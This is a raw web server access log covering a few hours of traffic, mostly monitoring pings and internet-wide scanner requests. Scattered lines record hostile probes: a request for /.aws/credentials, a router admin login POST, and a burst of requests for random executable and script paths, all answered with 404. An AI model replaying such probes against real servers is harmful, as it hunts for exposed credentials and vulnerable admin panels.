192.155.90.118 - - [06/Sep/2023:04:54:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.251 - - [06/Sep/2023:04:57:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.205.213.94 - - [06/Sep/2023:04:57:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
62.210.217.120 - - [06/Sep/2023:04:57:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0"
109.205.213.94 - - [06/Sep/2023:04:59:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.231 - - [06/Sep/2023:04:59:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.234.204.134 - - [06/Sep/2023:05:00:00 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Config/99.2.4111.12"
172.105.128.12 - - [06/Sep/2023:05:00:26 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.128.205 - - [06/Sep/2023:05:01:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.205.213.94 - - [06/Sep/2023:05:01:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.216.150.215 - - [06/Sep/2023:05:05:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.180.143.72 - - [06/Sep/2023:05:06:04 +0200] "GET /favicon-32x32.png HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
172.104.11.51 - - [06/Sep/2023:05:06:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.205.213.94 - - [06/Sep/2023:05:08:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
109.205.213.94 - - [06/Sep/2023:05:08:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.79.181.179 - - [06/Sep/2023:05:10:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.205.213.94 - - [06/Sep/2023:05:13:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.91 - - [06/Sep/2023:05:14:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.205.213.94 - - [06/Sep/2023:05:15:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.216.149.86 - - [06/Sep/2023:05:15:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
181.41.206.226 - - [06/Sep/2023:05:22:45 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; FBSMTWB; .NET CLR 2.0.34861; .NET CLR 3.0.3746.3218; .NET CLR 3.5.33652; msn OptimizedIE8;ENUS)"
213.61.218.52 - - [06/Sep/2023:05:24:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
213.61.218.52 - - [06/Sep/2023:05:24:13 +0200] "GET / HTTP/1.1" 200 1229 "http://www.google.de/" "finbot"
213.61.218.52 - - [06/Sep/2023:05:24:13 +0200] "GET / HTTP/1.1" 200 1229 "http://www.google.de/" "Mozilla/5.0 (Linux; U; Android 4.1.2; de-de; GT-I8190 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
87.236.176.8 - - [06/Sep/2023:05:28:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
198.235.24.202 - - [06/Sep/2023:05:30:41 +0200] "\x16\x03\x01" 501 318 "-" "-"
213.61.218.52 - - [06/Sep/2023:05:43:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
213.61.218.52 - - [06/Sep/2023:05:43:44 +0200] "GET / HTTP/1.1" 200 1229 "http://www.google.de/" "finbot"
213.61.218.52 - - [06/Sep/2023:05:43:44 +0200] "GET / HTTP/1.1" 200 1229 "http://www.google.de/" "Mozilla/5.0 (Linux; U; Android 4.1.2; de-de; GT-I8190 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
162.216.149.124 - - [06/Sep/2023:05:46:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
162.216.150.37 - - [06/Sep/2023:05:54:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
35.203.211.181 - - [06/Sep/2023:05:55:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
192.241.222.57 - - [06/Sep/2023:05:57:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.57 - - [06/Sep/2023:05:57:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.57 - - [06/Sep/2023:05:57:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.106.29.122 - - [06/Sep/2023:05:57:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
192.241.222.57 - - [06/Sep/2023:05:57:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.57 - - [06/Sep/2023:05:58:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.57 - - [06/Sep/2023:05:58:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.57 - - [06/Sep/2023:05:58:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.57 - - [06/Sep/2023:05:58:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.57 - - [06/Sep/2023:05:58:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.241.222.57 - - [06/Sep/2023:05:59:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
157.245.117.3 - - [06/Sep/2023:05:59:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
157.245.117.3 - - [06/Sep/2023:06:21:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
157.245.117.3 - - [06/Sep/2023:06:21:28 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.87/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
78.193.31.5 - - [06/Sep/2023:06:28:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.193.31.5 - - [06/Sep/2023:06:31:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
194.146.129.61 - - [06/Sep/2023:06:31:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
78.193.31.5 - - [06/Sep/2023:06:31:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.193.31.5 - - [06/Sep/2023:06:32:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.106.29.122 - - [06/Sep/2023:06:32:29 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
78.193.31.5 - - [06/Sep/2023:06:33:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.193.31.5 - - [06/Sep/2023:06:35:01 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.193.31.5 - - [06/Sep/2023:06:36:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.193.31.5 - - [06/Sep/2023:06:36:39 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.193.31.5 - - [06/Sep/2023:06:40:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.193.31.5 - - [06/Sep/2023:06:40:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
193.106.29.122 - - [06/Sep/2023:06:43:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
184.105.139.68 - - [06/Sep/2023:06:47:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
193.106.29.122 - - [06/Sep/2023:06:52:44 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
54.198.91.199 - - [06/Sep/2023:06:56:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/53.0.3044.66 Safari/537.32"
43.157.198.172 - - [06/Sep/2023:06:56:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
43.157.198.172 - - [06/Sep/2023:06:56:36 +0200] "GET /jquery-3.3.1.min.js HTTP/1.1" 404 324 "http://code.jquery.com/" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:37 +0200] "POST /categories/Yud HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
43.157.198.172 - - [06/Sep/2023:06:56:38 +0200] "POST /nation.php HTTP/1.1" 404 315 "-" "Mozilla_33741328"
43.157.198.172 - - [06/Sep/2023:06:56:38 +0200] "GET /is-bin HTTP/1.1" 404 311 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:39 +0200] "GET /is-bin HTTP/1.1" 404 311 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:40 +0200] "GET /news.php HTTP/1.1" 404 313 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:41 +0200] "GET /load HTTP/1.1" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727)"
43.157.198.172 - - [06/Sep/2023:06:56:41 +0200] "GET /8.bin HTTP/1.1" 404 310 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:42 +0200] "GET /hrsgdsb7386wknzms.jpg HTTP/1.1" 404 326 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:42 +0200] "GET /UnityPlayer.dll HTTP/1.1" 404 320 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:43 +0200] "GET /ttd.exe HTTP/1.1" 404 312 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:43 +0200] "GET /qd.CHM HTTP/1.1" 404 311 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:44 +0200] "GET /zMLUH93A HTTP/1.1" 404 313 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:44 +0200] "GET /Display/chan/IB61I7MYA HTTP/1.1" 404 327 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:45 +0200] "GET /jquery-3.3.1.min.js HTTP/1.1" 404 324 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:46 +0200] "GET /Gmail/UnityPlayer.txt HTTP/1.1" 404 326 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:47 +0200] "GET /new/login HTTP/1.1" 404 314 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:47 +0200] "GET /viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7%A2 HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
43.157.198.172 - - [06/Sep/2023:06:56:48 +0200] "GET /e3e7e71a0b28b5e96cc492e636722f73/4sVKAOvu3D/BDyot0NxyG.php HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101"
43.157.198.172 - - [06/Sep/2023:06:56:49 +0200] "GET /jquery.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
43.157.198.172 - - [06/Sep/2023:06:56:50 +0200] "GET /wh/glass.php HTTP/1.1" 404 317 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:50 +0200] "GET /login HTTP/1.1" 404 310 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:51 +0200] "GET /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab HTTP/1.1" 404 377 "-" "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31"
43.157.198.172 - - [06/Sep/2023:06:56:52 +0200] "GET /c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab HTTP/1.1" 404 377 "-" "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31"
43.157.198.172 - - [06/Sep/2023:06:56:52 +0200] "GET /fw6I HTTP/1.1" 404 309 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:53 +0200] "GET /fw6I HTTP/1.1" 404 309 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:53 +0200] "GET /zA7j HTTP/1.1" 404 309 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:54 +0200] "GET /Jh6t HTTP/1.1" 404 309 "-" "'Mozilla/5.0"
43.157.198.172 - - [06/Sep/2023:06:56:55 +0200] "GET /Visu/ens/events HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
43.157.198.172 - - [06/Sep/2023:06:56:55 +0200] "GET /Visu/ens/events HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
193.34.212.110 - - [06/Sep/2023:06:58:00 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Sep/2023:07:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [06/Sep/2023:07:02:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [06/Sep/2023:07:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.2 - - [06/Sep/2023:07:06:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
216.218.206.67 - - [06/Sep/2023:07:06:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
184.105.139.69 - - [06/Sep/2023:07:06:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
212.91.246.72 - - [06/Sep/2023:07:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.218.206.67 - - [06/Sep/2023:07:08:18 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
184.105.139.69 - - [06/Sep/2023:07:08:29 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
74.82.47.2 - - [06/Sep/2023:07:08:32 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0"
212.91.246.72 - - [06/Sep/2023:07:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.218.206.67 - - [06/Sep/2023:07:09:06 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
184.105.139.69 - - [06/Sep/2023:07:09:25 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
212.91.246.72 - - [06/Sep/2023:07:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.2 - - [06/Sep/2023:07:09:55 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
212.91.246.72 - - [06/Sep/2023:07:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [06/Sep/2023:07:15:12 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [06/Sep/2023:07:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [06/Sep/2023:07:17:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [06/Sep/2023:07:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.79.162.186 - - [06/Sep/2023:07:48:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [06/Sep/2023:07:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.190.156.164 - - [06/Sep/2023:07:50:10 +0200] "GET /cgi-bin/luci HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1"
212.91.246.72 - - [06/Sep/2023:07:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:07:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
119.18.146.40 - - [06/Sep/2023:07:54:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [06/Sep/2023:07:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.230 - - [06/Sep/2023:07:56:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
